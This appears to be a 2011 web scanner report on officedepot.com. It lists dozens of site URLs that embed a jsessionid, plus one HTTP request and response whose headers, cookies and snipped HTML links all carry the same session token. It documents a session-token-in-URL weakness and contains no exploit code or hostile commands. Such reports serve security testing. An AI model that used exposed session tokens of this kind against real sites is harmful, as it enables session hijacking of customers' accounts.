http://www.officedepot.com/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15034&redirect=false
http://www.officedepot.com/ads/displayStoreAds.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?popup=true&redirect=false
http://www.officedepot.com/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/catalog/AZ.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/catalog/search.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&Ntt=office+products
http://www.officedepot.com/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847490&jvalidator=REuaHJmhXhcYJBiGGOm5WA%3D%3D
http://www.officedepot.com/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847523&jvalidator=euDUVKp%2Bb%2BhWjIe7QTbpVw%3D%3D
http://www.officedepot.com/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/csl/saveToListFromCartFlyout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/customerservice/errata.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/customerservice/index.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/directions.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/environment;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/espanol;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/promo.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0118_product.jsp
http://www.officedepot.com/purchaseGiftCard.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/renderStaticPage.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/womeninbiz/index.jsp&template=companyInfo
http://www.officedepot.com/shred;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/odservicesBody.jsp&template=customerservice
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/bbnational.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/businesscenter/partners/fax2mail.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/affiliateprogram.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/diversitymissionstatement.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/govprogram.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/companyfacts/index.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/default.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/companyinfo/international/international.jsp&template=companyInfo
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/forms/default.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/content/businesstools/sbh/default.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/creditcard/creditcard.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Privacy.jsp&template=customerService
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/Refunds.jsp&template=customerService
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/customerservice/termsofuse.jsp&template=customerService#l1
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/delivery.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/deliveryOptions.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/backtoschool/5percent.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0127_google.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/0928_recycling.jsp&template=customerservice
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/promo/pages/christopherlowell.jsp
http://www.officedepot.com/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/webcafe/main.jsp
http://www.officedepot.com/storeDetails.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/videogallery;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
http://www.officedepot.com/virtualcatalog/virtualcatalog.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/account/accountSummaryDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/account/editBillingDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/account/editContactDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847522&jvalidator=5W7oKmVCxwu%2BVdepVt1BMw%3D%3D
https://www.officedepot.com/account/loginAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/account/registrationDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/account/shippingListDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/catalogrequest/catalogRequestDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/customerservice/customerServiceDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/orderhistory/orderHistoryAnonDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/orderhistory/orderHistoryList.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic
https://www.officedepot.com/orderhistory/submitReturn.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?searchFromDate=12/26/2010&searchToDate=01/25/2011

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Tue, 25 Jan 2011 05:04:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic; Path=/
Set-Cookie: jsession_unique_id=1295931847463; Expires=Tue, 25 Jan 2011 06:34:07 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Fri, 20 Jan 2012 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=5yEwWrYJ3VxcYFAH_1ES2aP; Expires=Thu, 24 Feb 2011 05:04:07 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 73834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html class="nojs" xmlns=
...[SNIP]...
<li id="homeLink"><a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Home</a></li>

   <li id="languageSwitch"><a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="dropdown">United States (English)</a>
...[SNIP]...
<div class="brandLogo">
       <a href="/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" id="logo" class=""><img src="http://static.www.odcdn.com/images/us/od/brand.gif" alt="OfficeDepot.com - Taking Care Of Business. Office Supplies, Furniture, Technology & More!" title="OfficeDepot.com - Taking Care Of B
...[SNIP]...
<li id='storeLocator' class="overlayContainer">


                       <a href="/storelocator/input.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" target="_top" class="headingLink"><strong>
...[SNIP]...
<span id="storeLocatorLinks"><a href="/storeDetails.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" id="storeDetailLink" class="">Store Details</a> | <a href="/directions.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Need Directions?</a>
...[SNIP]...
<li id='orderByCatalog' class="overlayContainer">
            <a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="headingLink"><strong class="trigger">
...[SNIP]...
<li class=""><a href="/csl/quickAddBySku.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Order by Item #</a>
...[SNIP]...
<li><a href="/virtualcatalog/virtualcatalog.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">View Online Catalog</a>
...[SNIP]...
<li><a href="/a/catalog-request/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic">Request a Catalog</a>
...[SNIP]...
<div class="smCartSummaryDiv printHide">
                       <a href="/specialLinks.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?file=/misc/deliveryOptions.jsp" class="note">$50.00 more for FREE Next Business Day Delivery!*<br/>
...[SNIP]...
<li id='viewCart'>


                                                                    <a href="/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="cart" title="View Cart">View Cart</a>
...[SNIP]...
<li id="checkOut">


                                                                                                                                                                                                                       <a href="https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="checkout" title="Checkout">Checkout</a>
...[SNIP]...
<li id="shoppingList">


                           <a href="/csl/listAll.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?&jtime=1295931847490&jvalidator=REuaHJmhXhcYJBiGGOm5WA%3D%3D" class="accountLogin">Shopping List</a>
...[SNIP]...
<div class="b1">
                       <a href="/cart/shoppingCart.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="button">VIEW CART</a>
...[SNIP]...
<div class="b1">
                           <a href="/csl/saveToListFromCartFlyout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="button accountLogin">Add To My Shopping List</a>
...[SNIP]...
<div class="b1a">


                               <a href="https://www.officedepot.com/cart/checkout.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="button" title="Checkout">Checkout</a>
...[SNIP]...
<li class="login">
   <a href="https://www.officedepot.com/account/loginAccountDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" id="modalAccountLoginID" class="accountLogin" title="Log in"><strong>
...[SNIP]...
<li class="register"> - 
   <a href="https://www.officedepot.com/account/registrationDisplay.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic"" class="" title="Register">Register</a>
...[SNIP]...
<h2>
       <a href="/a/browse/office-supplies/N=5+1676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<p class='section'><a id="v2_navtop_office_supplies" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=12157&redirect=false"><img src="http://static.www.odcdn.com/images/us/od/tiles/od_nav_menu_prvt_tile.gif" height="30" width="372" border="0" alt="Save On Office Depot Brand Products!">
...[SNIP]...
<h4><a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Binders & Accessories</a>
...[SNIP]...
<li><a href="/a/browse/binder-accessories/N=5+2156/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binder Accessories</a>
...[SNIP]...
<li><a href="/a/browse/binders/N=5+2177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binders</a>
...[SNIP]...
<li><a href="/a/browse/indexes-tabs-and-dividers/N=5+2228/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Indexes, Tabs & Dividers</a>
...[SNIP]...
<li><a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Basic Supplies</a>
...[SNIP]...
<li><a href="/a/browse/clips-pushpins-fasteners-and-rubber-bands/N=5+1935/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Clips, Pushpins, Fasteners & Rubber Bands</a>
...[SNIP]...
<li><a href="/a/browse/message-pads-and-memo-books/N=5+2004/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Message Pads & Memo Books</a>
...[SNIP]...
<li><a href="/a/browse/staplers-staples-and-removers/N=5+2113/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Staplers, Staples & Removers</a>
...[SNIP]...
<li><a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Cleaning & Breakroom</a>
...[SNIP]...
<li><a href="/a/browse/cleaners-and-disinfectants/N=5+2363/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cleaners & Disinfectants</a>
...[SNIP]...
<li><a href="/a/browse/food-and-beverage/N=5+2546/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Food & Beverage</a>
...[SNIP]...
<li><a href="/a/browse/paper-products-and-dispensers/N=5+2602/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Paper Products & Dispensers</a>
...[SNIP]...
<li><a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Filing & Storage</a>
...[SNIP]...
<li><a href="/a/browse/file-folders/N=5+3545/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">File Folders</a>
...[SNIP]...
<li><a href="/a/browse/hanging-file-folders/N=5+3628/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Hanging File Folders</a>
...[SNIP]...
<li><a href="/a/browse/storage--files-boxes-and-more/N=5+3733/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Storage: Files, Boxes & More</a>
...[SNIP]...
<li><a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Paper, Forms, Envelopes</a>
...[SNIP]...
<li><a href="/a/browse/business-forms-tax-forms-and-recordkeeping/N=5+4094/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Forms, Tax Forms & Recordkeeping</a>
...[SNIP]...
<li><a href="/a/browse/envelopes/N=5+4177/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Envelopes</a>
...[SNIP]...
<li><a href="/a/browse/copy-and-multipurpose-paper-white/N=5+487272/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Copy & Multipurpose Paper (White)</a>
...[SNIP]...
<li><a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Pens, Pencils & Markers</a>
...[SNIP]...
<li><a href="/a/browse/markers-and-highlighters/N=5+4467/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Markers & Highlighters</a>
...[SNIP]...
<li><a href="/a/browse/pencils/N=5+4504/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pencils</a>
...[SNIP]...
<li><a href="/a/browse/pens/N=5+4520/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens</a>
...[SNIP]...
<li><a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<li>
               <a href="/a/browse/av-supplies-and-equipment/N=5+1677/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">AV Supplies & Equipment</a>
...[SNIP]...
<li>
               <a href="/a/browse/basic-supplies/N=5+1886/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Basic Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/binders-and-accessories/N=5+2155/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Binders & Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/business-cases/N=5+2674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Business Cases</a>
...[SNIP]...
<li>
               <a href="/a/browse/calendars-and-planners/N=5+2776/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Calendars & Planners</a>
...[SNIP]...
<li>
               <a href="/a/browse/cleaning-and-breakroom/N=5+2316/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Cleaning & Breakroom</a>
...[SNIP]...
<li>
               <a href="/a/browse/custom-printing/N=5+2930/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Custom Printing</a>
...[SNIP]...
<li>
               <a href="/a/browse/desk-and-wall-accessories/N=5+3347/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desk & Wall Accessories</a>
...[SNIP]...
<li>
               <a href="/a/browse/executive-gifts/N=5+3415/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Executive Gifts</a>
...[SNIP]...
<li>
               <a href="/a/browse/filing-and-storage/N=5+3469/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Filing & Storage</a>
...[SNIP]...
<li>
               <a href="/a/browse/ink-toner-and-ribbons/N=5+513380/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Ink, Toner & Ribbons</a>
...[SNIP]...
<li>
               <a href="/a/browse/labels-and-label-makers/N=5+3806/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Labels & Label Makers</a>
...[SNIP]...
<li>
               <a href="/a/browse/mailroom-supplies/N=5+3912/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Mailroom Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/office-depot-brand-products/N=5+422825/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Office Depot Brand Products</a>
...[SNIP]...
<li>
               <a href="/a/browse/paper-forms-envelopes/N=5+4072/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Paper, Forms, Envelopes</a>
...[SNIP]...
<li>
               <a href="/a/browse/pens-pencils-and-markers/N=5+4367/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Pens, Pencils & Markers</a>
...[SNIP]...
<li>
               <a href="/a/browse/promotional-products/N=5+4581/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Promotional Products</a>
...[SNIP]...
<li>
               <a href="/a/browse/school-supplies/N=5+502600/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">School Supplies</a>
...[SNIP]...
<li>
               <a href="/a/browse/self-stick-notes-and-flags/N=5+6188/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Self-Stick Notes & Flags</a>
...[SNIP]...
<li>
               <a href="/a/browse/tape-and-adhesives/N=5+371557/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tape & Adhesives</a>
...[SNIP]...
<li>
               <a href="/a/browse/teacher-and-classroom-supplies/N=5+502674/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Teacher & Classroom Supplies</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_1" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15032&redirect=false">FREE 24-pk AA Batteries with spend of $125 or more on 2 HP Toner cartridges</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_2" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15033&redirect=false">Save up to 40% off Select Bankers Box Records Storage</a>
...[SNIP]...
<p><a id="v2_nav_office_supplies_3" href="/adRedir.do;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic?ciid=15034&redirect=false">Buy any HP LaserJet Printer and any HP Toner and Save $10</a>
...[SNIP]...
<h2>
       <a href="/a/browse/technology/N=5+9021/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a1"><span>
...[SNIP]...
<h4><a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Computer Accessories</a>
...[SNIP]...
<li><a href="/a/browse/keyboards-and-mice/N=5+509558/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Keyboards & Mice</a>
...[SNIP]...
<li><a href="/a/browse/laptop-accessories/N=5+509569/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laptop Accessories</a>
...[SNIP]...
<li><a href="/a/browse/powersurge-protectors/N=5+509579/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Power/Surge Protectors</a>
...[SNIP]...
<li><a href="/a/browse/webcams/N=5+509587/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Webcams</a>
...[SNIP]...
<li><a href="/a/browse/computer-accessories/N=5+509547/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Computers & Servers</a>
...[SNIP]...
<li><a href="/a/browse/desktop-computers/N=5+509615/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Desktop Computers</a>
...[SNIP]...
<li><a href="/a/browse/laptops/N=5+509617/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Laptops</a>
...[SNIP]...
<li><a href="/a/browse/servers/N=5+510989/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Servers</a>
...[SNIP]...
<li><a href="/a/browse/tablet-pcs/N=5+509621/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Tablet PCs</a>
...[SNIP]...
<li><a href="/a/browse/computers-and-servers/N=5+509612/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Data Storage & Media</a>
...[SNIP]...
<li><a href="/a/browse/external-hard-drives/N=5+509636/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">External Hard Drives</a>
...[SNIP]...
<li><a href="/a/browse/internal-hard-drives/N=5+509641/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Internal Hard Drives</a>
...[SNIP]...
<li><a href="/a/browse/media/N=5+509644/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Media</a>
...[SNIP]...
<li><a href="/a/browse/portable-flash-drives/N=5+509664/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Portable Flash Drives</a>
...[SNIP]...
<li><a href="/a/browse/data-storage-and-media/N=5+509625/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
<h4><a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="nav_a2">Monitors & Projectors</a>
...[SNIP]...
<li><a href="/a/browse/interactive-whiteboards/N=5+513187/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Interactive Whiteboards</a>
...[SNIP]...
<li><a href="/a/browse/monitor-accessories/N=5+509672/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitor Accessories</a>
...[SNIP]...
<li><a href="/a/browse/monitors/N=5+509676/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Monitors</a>
...[SNIP]...
<li><a href="/a/browse/projectors/N=5+509684/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="">Projectors</a>
...[SNIP]...
<li><a href="/a/browse/monitors-and-projectors/N=5+509669/;jsessionid=00005yEwWrYJ3VxcYFAH_1ES2aP:13ddq0sic" class="see_all">See all</a>
...[SNIP]...
